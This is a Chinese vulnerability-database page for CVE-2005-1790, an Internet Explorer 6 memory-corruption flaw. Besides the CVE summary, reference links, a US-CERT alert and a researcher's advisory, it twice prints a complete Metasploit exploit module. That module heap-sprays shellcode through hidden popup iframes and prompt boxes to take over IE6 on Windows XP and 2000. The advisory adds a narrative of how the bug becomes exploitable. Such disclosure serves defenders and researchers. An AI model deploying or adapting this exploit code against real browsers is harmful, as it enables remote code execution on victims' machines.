CVE-2005-1790
CVSS2.6
发布时间 :2005-06-01 00:00:00
修订时间 :2016-10-17 23:22:33
NMCOEPS    

[原文]Microsoft Internet Explorer 6 SP2 6.0.2900.2180 and 6.0.2800.1106, and earlier versions, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a Javascript BODY onload event that calls the window function, aka "Mismatched Document Object Model Objects Memory Corruption Vulnerability."


[CNNVD]Microsoft IE 远程执行代码漏洞(CNNVD-200506-003)

        Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
        如果同事件使用的话,IE就不能正确的初始化JavaScript "Window()"函数,导致Internet Explorer在试图调用ECX中引用的32位地址时会出现异常:
        CALL DWORD [ECX+8]
        由于这个漏洞,名为"OBJECT"文本字符串的Unicode表示可能无意中构成ECX,具体来说就是0x006F005B。由于0x006F005B偏移指向无效的或不存在的内存位置,因此Internet Explorer就无法处理,终端用户会遇到拒绝服务。
        尽管这个漏洞无法导致控制任何内部寄存器和/或指向任何无法控制的偏移,但某些情况下可能会允许执行远程代码。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-399 [资源管理错误]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:6.0.2900.2180Microsoft Internet Explorer 6.0.2900.2180
cpe:/a:microsoft:ie:6.0.2800.1106Microsoft Internet Explorer 6.0.2800.1106

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:722Win2K/XP,SP1 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1508Server 2003,SP1 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1489Win2k,SP4 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1303WinXP,SP1 (64-bit) IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1299WinXP,SP2 IE Mismatched Document Object Memory Corruption Vulnerability
oval:org.mitre.oval:def:1091Server 2003 IE Mismatched Document Object Memory Corruption Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1790
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1790
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-003
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111746394106172&w=2
(UNKNOWN)  BUGTRAQ  20050528 Microsoft Internet Explorer - Crash on JavaScript "window()"-calling (05/28/2005)
http://marc.info/?l=bugtraq&m=111755552306013&w=2
(UNKNOWN)  BUGTRAQ  20050530 Re: Microsoft Internet Explorer - Crash on JavaScript "window()"-calling (05/28/2005)
http://securitytracker.com/id?1015251
(UNKNOWN)  SECTRACK  1015251
http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-234.pdf
http://www.computerterrorism.com/research/ie/ct21-11-2005
(UNKNOWN)  MISC  http://www.computerterrorism.com/research/ie/ct21-11-2005
http://www.kb.cert.org/vuls/id/887861
(UNKNOWN)  CERT-VN  VU#887861
http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx
(UNKNOWN)  MS  MS05-054
http://www.securityfocus.com/archive/1/archive/1/417326/30/0/threaded
(UNKNOWN)  BUGTRAQ  20051121 Computer Terrorism Security Advisory (Reclassification) - Microsoft Internet Explorer JavaScript Window() Vulnerability
http://www.securityfocus.com/bid/13799
(UNKNOWN)  BID  13799
http://www.us-cert.gov/cas/techalerts/TA05-347A.html
(UNKNOWN)  CERT  TA05-347A
http://www.vupen.com/english/advisories/2005/2509
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2509
http://www.vupen.com/english/advisories/2005/2867
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2867
http://www.vupen.com/english/advisories/2005/2909
(VENDOR_ADVISORY)  VUPEN  ADV-2005-2909
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420

- 漏洞信息

Microsoft IE 远程执行代码漏洞
低危 资源管理错误
2005-06-01 00:00:00 2006-06-15 00:00:00
远程  
        Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。
        如果同事件使用的话,IE就不能正确的初始化JavaScript "Window()"函数,导致Internet Explorer在试图调用ECX中引用的32位地址时会出现异常:
        CALL DWORD [ECX+8]
        由于这个漏洞,名为"OBJECT"文本字符串的Unicode表示可能无意中构成ECX,具体来说就是0x006F005B。由于0x006F005B偏移指向无效的或不存在的内存位置,因此Internet Explorer就无法处理,终端用户会遇到拒绝服务。
        尽管这个漏洞无法导致控制任何内部寄存器和/或指向任何无法控制的偏移,但某些情况下可能会允许执行远程代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx

- 漏洞信息 (18365)

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability (EDBID:18365)
windows remote
2012-01-14 Verified
0 metasploit
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
			'Description'    => %q{
				This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
				conjunction with an improperly initialized 'window()' JavaScript function.
				This exploit results in a call to an address lower than the heap. The javascript
				prompt() places our shellcode near where the call operand points to.  We call
				prompt() multiple times in separate iframes to place our return address.
				We hide the prompts in a popup window behind the main window. We spray the heap
				a second time with our shellcode and point the return address to the heap. I use
				a fairly high address to make this exploit more reliable. IE will crash when the
				exploit completes.  Also, please note that Internet Explorer must allow popups
				in order to continue exploitation.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Benjamin Tobias Franz', # Discovery
					'Stuart Pearson',        # Proof of Concept
					'Sam Sharps'             # Metasploit port
				],
			'References'     =>
				[
					['MSB', 'MS05-054'],
					['CVE', '2005-1790'],
					['OSVDB', '17094'],
					['URL', 'http://www.securityfocus.com/bid/13799/info'],
					['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
					[ 'Internet Explorer 6 Windows 2000',  { 'iframes' => 8 } ],
				],
			'DisclosureDate' => 'Nov 21 2005',
			'DefaultTarget'  => 0))
	end

	def exploit
		@var_redir = rand_text_alpha(rand(100)+1)
		super
	end

	def auto_target(cli, request)
		mytarget = nil

		agent = request.headers['User-Agent']
		print_status("Checking user agent: #{agent}")

		if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
			mytarget = targets[0]   # IE6 on XP
		elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
			mytarget = targets[1]	# IE6 on 2000
		else
			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
		end

		mytarget
	end


	def on_request_uri(cli, request)
		mytarget   = auto_target(cli, request)
		var_title  = rand_text_alpha(rand(100) + 1)
		func_main  = rand_text_alpha(rand(100) + 1)

		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
function heapspray()
{
	shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
	var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
	var headersize = 20;
	var slackspace = headersize + shellcode.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
	while (block.length + slackspace < 0x40000) block = block + block + fillblock;
	var memory = new Array();
	for (i = 0; i < 250; i++){ memory[i] = block + shellcode }

	var ret = "";
	var fillmem = "";

	for (i = 0; i < 500; i++)
		ret += unescape("%u0F0F%u0F0F");
	for (i = 0; i < 200; i++)
		fillmem += ret;

	prompt(fillmem, "");
}
|
		heapspray.obfuscate

		nofunc = ::Rex::Exploitation::JSObfu.new %Q|

if (document.location.href.indexOf("#{@var_redir}") == -1)
{
	var counter = 0;


	top.consoleRef = open('','BlankWindow',
	'width=100,height=100'
	+',menubar=0'
	+',toolbar=1'
	+',status=0'
	+',scrollbars=0'
	+',left=1'
	+',top=1'
	+',resizable=1')
	self.focus()


	for (counter = 0; counter < #{mytarget['iframes']}; counter++)
	{
		top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
	}
	document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");

}
else
{
	#{heapspray.sym('heapspray')}();
}
|

		nofunc.obfuscate

		main = %Q|
function #{func_main}()
{
	document.write("<TITLE>#{var_title}</TITLE>");
	document.write("<body onload=window();>");

	window.location.reload();
}
|

		html = %Q|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script>
#{nofunc}
#{heapspray}
#{main}
</script>
</head>
<body>
</body>
</html>
|

		print_status("Sending #{self.name} to client #{cli.peerhost}")
		# Transmit the compressed response to the client
		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

		# Handle the payload
		handler(cli)
	end
end
		

- 漏洞信息 (F108617)

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution (PacketStormID:F108617)
2012-01-13 00:00:00
Benjamin Tobias Franz,Stuart Pearson,Sam Sharps  metasploit.com
exploit,javascript,shellcode
CVE-2005-1790
[点击下载]

This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places the shellcode near where the call operand points to. The module calls prompt() multiple times in separate iframes to place our return address. The module hides the prompts in a popup window behind the main window and then it will spray the heap a second time with the shellcode and point the return address to the heap. It then uses a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
			'Description'    => %q{
				This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
				conjunction with an improperly initialized 'window()' JavaScript function.
				This exploit results in a call to an address lower than the heap. The javascript
				prompt() places our shellcode near where the call operand points to.  We call
				prompt() multiple times in separate iframes to place our return address.
				We hide the prompts in a popup window behind the main window. We spray the heap
				a second time with our shellcode and point the return address to the heap. I use
				a fairly high address to make this exploit more reliable. IE will crash when the
				exploit completes.  Also, please note that Internet Explorer must allow popups
				in order to continue exploitation.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Benjamin Tobias Franz', # Discovery
					'Stuart Pearson',        # Proof of Concept
					'Sam Sharps'             # Metasploit port
				],
			'References'     =>
				[
					['MSB', 'MS05-054'],
					['CVE', '2005-1790'],
					['URL', 'http://www.securityfocus.com/bid/13799/info'],
					['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ],
					[ 'Internet Explorer 6 Windows 2000',  { 'iframes' => 8 } ],
				],
			'DisclosureDate' => 'Nov 21 2005',
			'DefaultTarget'  => 0))
	end

	def exploit
		@var_redir = rand_text_alpha(rand(100)+1)
		super
	end

	def auto_target(cli, request)
		mytarget = nil

		agent = request.headers['User-Agent']
		print_status("Checking user agent: #{agent}")

		if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
			mytarget = targets[0]   # IE6 on XP
		elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
			mytarget = targets[1]	# IE6 on 2000
		else
			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
		end

		mytarget
	end


	def on_request_uri(cli, request)
		mytarget   = auto_target(cli, request)
		var_title  = rand_text_alpha(rand(100) + 1)
		func_main  = rand_text_alpha(rand(100) + 1)

		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
function heapspray()
{
	shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
	var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
	var headersize = 20;
	var slackspace = headersize + shellcode.length;
	while (bigblock.length < slackspace) bigblock += bigblock;
	var fillblock = bigblock.substring(0,slackspace);
	var block = bigblock.substring(0,bigblock.length - slackspace);
	while (block.length + slackspace < 0x40000) block = block + block + fillblock;
	var memory = new Array();
	for (i = 0; i < 250; i++){ memory[i] = block + shellcode }

	var ret = "";
	var fillmem = "";

	for (i = 0; i < 500; i++)
		ret += unescape("%u0F0F%u0F0F");
	for (i = 0; i < 200; i++)
		fillmem += ret;

	prompt(fillmem, "");
}
|
		heapspray.obfuscate

		nofunc = ::Rex::Exploitation::JSObfu.new %Q|

if (document.location.href.indexOf("#{@var_redir}") == -1)
{
	var counter = 0;


	top.consoleRef = open('','BlankWindow',
	'width=100,height=100'
	+',menubar=0'
	+',toolbar=1'
	+',status=0'
	+',scrollbars=0'
	+',left=1'
	+',top=1'
	+',resizable=1')
	self.focus()


	for (counter = 0; counter < #{mytarget['iframes']}; counter++)
	{
		top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
	}
	document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");

}
else
{
	#{heapspray.sym('heapspray')}();
}
|

		nofunc.obfuscate

		main = %Q|
function #{func_main}()
{
	document.write("<TITLE>#{var_title}</TITLE>");
	document.write("<body onload=window();>");

	window.location.reload();
}
|

		html = %Q|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<script>
#{nofunc}
#{heapspray}
#{main}
</script>
</head>
<body>
</body>
</html>
|

		print_status("Sending #{self.name} to client #{cli.peerhost}")
		# Transmit the compressed response to the client
		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

		# Handle the payload
		handler(cli)
	end
end
    

- 漏洞信息 (F42292)

Technical Cyber Security Alert 2005-347A (PacketStormID:F42292)
2005-12-14 00:00:00
US-CERT  us-cert.gov
advisory,remote,denial of service,arbitrary,vulnerability
CVE-2005-1790,CVE-2005-2127
[点击下载]

Technical Cyber Security Alert TA05-347A - Microsoft has released updates that address critical vulnerabilities in Internet Explorer (IE). A remote, unauthenticated attacker could exploit these vulnerabilities to execute arbitrary code or cause a denial of service on an affected system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


            Technical Cyber Security Alert TA05-347A

           Microsoft Internet Explorer Vulnerabilities

   Original release date: December 13, 2005
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows
     * Microsoft Internet Explorer

   For more complete information, refer to the Microsoft Security
   Bulletin Summary for December 2005.

Overview

   Microsoft has released updates that address critical vulnerabilities
   in Internet Explorer (IE). A remote, unauthenticated attacker could
   exploit these vulnerabilities to execute arbitrary code or cause a
   denial of service on an affected system.

I. Description

   The Microsoft Security Bulletins for December 2005 address
   vulnerabilities in Microsoft Windows and Internet Explorer. By
   convincing a user to view a specially crafted HTML document, such as a
   web page or an HTML email message or attachment, an attacker could
   execute arbitrary code with the privileges of the user. The attacker
   could also cause IE or the program using the WebBrowser control to
   crash.

   Further information is available in the following US-CERT
   Vulnerability Notes:

   VU#887861 - Microsoft Internet Explorer vulnerable to code execution
   via mismatched DOM objects 

   Microsoft Internet Explorer fails to properly handle requests to
   mismatched DOM objects, which may allow a remote attacker to execute
   arbitrary code on a vulnerable system.
   (CVE-2005-1790)

   VU#959049 - Several COM objects cause memory corruption in Microsoft
   Internet Explorer 

   Microsoft Internet Explorer allows instantiation of COM objects not
   designed for use in the browser, which may allow an attacker to
   execute arbitrary code or crash IE.
   (CVE-2005-2127)

II. Impact

   A remote, unauthenticated attacker exploiting these vulnerabilities
   could execute arbitrary code with the privileges of the user. If the
   user is logged on with administrative privileges, the attacker could
   take complete control of an affected system or cause a denial of
   service.

III. Solution

Apply Updates

   Microsoft has provided the updates for these and other vulnerabilities
   in the December 2005 Security Bulletins and on the Microsoft Update
   site.

Disable ActiveX

   Disable ActiveX in the Internet Zone to further protect against the
   vulnerabilities described in VU#959049 and VU#680526. Instructions for
   disabling ActiveX are available in the CERT/CC Malicious Web Scripts
   FAQ. Note that disabling ActiveX will reduce the functionality of some
   web sites.

   The updates provided by MS05-037, MS05-038, MS05-052, and MS05-054
   block COM objects known to be vulnerable, however there may be more.

Appendix A. References

     * Microsoft Security Bulletin Summary for December 2005 -
       <http://www.microsoft.com/technet/security/bulletin/ms05-dec.mspx>

     * Microsoft Security Bulletin MS05-054 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-054.mspx>

     * Microsoft Security Bulletin MS05-052 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-052.mspx>

     * Microsoft Security Bulletin MS05-038 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-038.mspx>

     * Microsoft Security Bulletin MS05-037 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-037.mspx>

     * US-CERT Vulnerability Note VU#887861 -
       <http://www.kb.cert.org/vuls/id/887861>

     * US-CERT Vulnerability Note VU#959049 -
       <http://www.kb.cert.org/vuls/id/959049>

     * US-CERT Vulnerability Note VU#680526 -
       <http://www.kb.cert.org/vuls/id/680526>

     * CVE-2005-1790 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1790>

     * CVE-2005-2127 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2127>

     * CERT/CC Malicious Web Scripts FAQ -
       <http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>

     * Improve the safety of your browsing and e-mail activities -
       <http://www.microsoft.com/athome/security/online/browsing_safety.m
       spx>

     * Security Essentials -
       <http://www.microsoft.com/athome/security/protect/default.aspx>

     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>

     _________________________________________________________________


   The most recent version of this document can be found at:

     <http://www.us-cert.gov/cas/techalerts/TA05-347A.html> 

     _________________________________________________________________


   Feedback can be directed to US-CERT Technical Staff. Please send
   email to <cert@cert.org> with "TA05-347A Feedback VU#887861" in the
   subject.

     _________________________________________________________________

   For instructions on subscribing to or unsubscribing from this
   mailing list, visit <http://www.us-cert.gov/cas/signup.html>. 

     _________________________________________________________________


   Produced 2005 by US-CERT, a government organization.

   Terms of use:

     <http://www.us-cert.gov/legal.html> 

     _________________________________________________________________


   Revision History

   December 13, 2005: Initial release



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQ59LY30pj593lg50AQLb7AgAyoitGXFhQ5kbEXQwDyZLsxMnA2NTH3NA
7Xo7HqFr230p0BwzusI48XbEUg/NVN4gEQEqaaI+Rq9hYbLj6mkmgYV0O3ljZ1Xq
zIHakv0GRA71JkC/npDEGeNxIgu3L0jNjnjrBc10Sh3gKTzLamfBpljhLUPkaa8V
SCjYJA3Tq9wJy8vyB+K0ApYYtLvW3LHsQIG3c4nKu/QPfn+uVSSrOFkeQq0JckDY
9P/hrCbfmG7jz8KVAhRl7w90zAZm/uIPUO0LUhBer1WebdUsu+cX/7q4/iDh16Dq
e74OK2S3P1hESn8wo7EYc/VL09aEw8k3EIfuFYO64EuQFu0Dd6Q39g==
=omN4
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F41890)

poc.tgz (PacketStormID:F41890)
2005-11-30 00:00:00
Stuart Pearson  computerterrorism.com
exploit,denial of service,javascript,code execution,proof of concept
CVE-2005-1790
[点击下载]

Proof of concept html that demonstrates the code execution flaw in the Microsoft Internet Explorer JavaScript Window() vulnerability previously considered to be simply a denial of service flaw.

- 漏洞信息 (F41889)

CT21-11-2005.txt (PacketStormID:F41889)
2005-11-30 00:00:00
Benjamin Tobias Franz  
advisory,remote,denial of service,arbitrary,javascript,code execution
CVE-2005-1790
[点击下载]

This document serves as a reclassification advisory for the Microsoft Internet Explorer JavaScript Window() DoS vulnerability, originally reported on 31/05/2005. Contrary to popular belief, the aforementioned security issue is susceptible to remote arbitrary code execution, yielding full system access with the privileges of the underlying user.

Computer Terrorism  (UK) 
========================


Security Advisory (Reclassification) :: CT21-11-2005
-----------------------------------------------------


Title:            Microsoft Internet Explorer JavaScript Window()
Vulnerability

Author:           S. Pearson
Organisation:     Computer Terrorism (UK)
Web:              www.computerterrorism.com
Advisory Date:    21st November, 2005


Software:         Microsoft Internet Explorer 5.5 & 6.x
Severity:         Critical (Elevated from low) 
Impact:           Remote System Access
Solution Status:  ** UNPATCHED **
CVE reference:    CAN-2005-1790

Credits:          Benjamin Tobias Franz  (original bug)



Overview:
---------

This document serves as a *reclassification* advisory for the Microsoft
Internet 
Explorer JavaScript Window() DoS vulnerability, originally reported on
31/05/2005.

Contrary to popular beliefs, the aforementioned security issue is
susceptible to remote 
arbitrary code execution, yielding full system access with the
privileges of the 
underlying user.



Technical Narrative:
--------------------

As well documented, the vulnerability is instigated by IE's failure to
correctly 
initialise the JavaScript "Window()" function when used in conjunction
with a 
<BODY onload> event. As a result, Internet Explorer encounters an
exception when 
trying to call a dereferenced 32bit address located in ECX, as
highlighted by the 
following line of code:

	CALL DWORD [ECX+8]  

Due to the bug, ECX is inadvertently populated by the Unicode
representation of a 
text string named "OBJECT", or more specifically 0x006F005B. As offset
0x006F005B 
points to an invalid (or non-existent) memory location, Internet
Explorer fails to 
progress, and in turn the end user experiences an application crash
(DoS).

Therefore, as the bug does not yield control of any internal register
and/or points 
to an offset of which we have no control, the original "low" risk
classification 
clearly reflects the improbable scenario for remote code execution.


How improbable?


If we take a closer look at the vulnerability, we actually see that the
instruction 
is trying to dereference an offset in the range of 0x00600000, which,
coincidently, 
is reserved for the facilitation of all opened Window characteristics on
the desktop. 

These structures vary in both length and content, but in the main, take
the form of 
window titles, buttons, and any File/edit/View menus bars attributable
to a particular 
Window session.

Consequently, it is feasible to assume that offset 0x006F005B could be
arrived at 
through the invocation of several new Windows structures, for example
circa 12 new 
web browsing sessions, which would increment 0x00600000 into 0x006F005B.

If this were possible, it would just leave the problem of trying to
identify a means 
by which custom shellcode could be inserted via one of the Window
Elements, and 
correctly aligned against the called [0x006F005B].

Accordingly, several methods were tested. By using a combination of
multiple open windows 
(expanding the memory section), and legal techniques that allow the
modification of 
certain Window elements (examples below), 3rd party code execution was
eventually 
realised!

Examples:

1.   Long HTML <TITLE>
2.   Long embedded Document File Names
3.   Large Alert Boxes


Unfortunately, all methods tested suffered from one major flaw -
inconsistency. 

The assumption that a potential victim has a clean desktop (no open
apps) compounded 
by the fact that most window elements encompasses some form of content
length restriction, 
results in a very small opportunity for any realistic exploitation.

Except, for one particular approach......a JavaScript prompt box.

By employing a simple technique to invoke multiple occurrences of large
JavaScript prompt 
Boxes, it is possible to flood/saturate the remoteness between
0x00600000 - 0x006F005B ++ 
with data of our choice, yielding very reliable execution of arbitrary
code.


Proof Of Concept:
-----------------

http://www.computerterrorism.com/research/ie/poc.htm


Temporary Solution:
-------------------

Until a patch is developed users are strongly advised to disable active
scripting for 
non-trusted sites.


Vendor Status:
--------------

The original DoS vulnerability was brought to the public's attention on
the 31/05/2005 
by Benjamin Tobias Franz. To date, the vendor has failed to publicly
acknowledge the 
presence of the flaw, or provide any timescales for an appropriate fix.
Accordingly, as 
of the date of this document, this vulnerability remains UNPATCHED,
affecting all users 
of Microsoft Internet Explorer version 5.5 and 6.x respectively.





_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

17094
Microsoft IE window() Function Arbitrary Code Execution
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

Internet Explorer contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue occurs when the browser does not properly handle requests to the window() object. A remote attacker could create a malicious website that uses an onload event to initialize a window() object, which may cause Internet Explorer to crash or execute arbitrary code with the privileges of the person running it.

- 时间线

2005-05-31 Unknow
2005-11-21 Unknow

- 解决方案

Microsoft has released a patch(MS05-054) to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): -Disable Active Scripting

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability
Design Error 13799
Yes No
2005-05-28 12:00:00 2005-05-28 12:00:00
Discovery is credited to Benjamin Tobias Franz <0-1-2-3@gmx.de>.

- 受影响的程序版本

Microsoft Internet Explorer 5.0.1 SP4
- Microsoft Windows 2000 Advanced Server SP4
- Microsoft Windows 2000 Datacenter Server SP4
- Microsoft Windows 2000 Professional SP4
- Microsoft Windows 2000 Server SP4
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
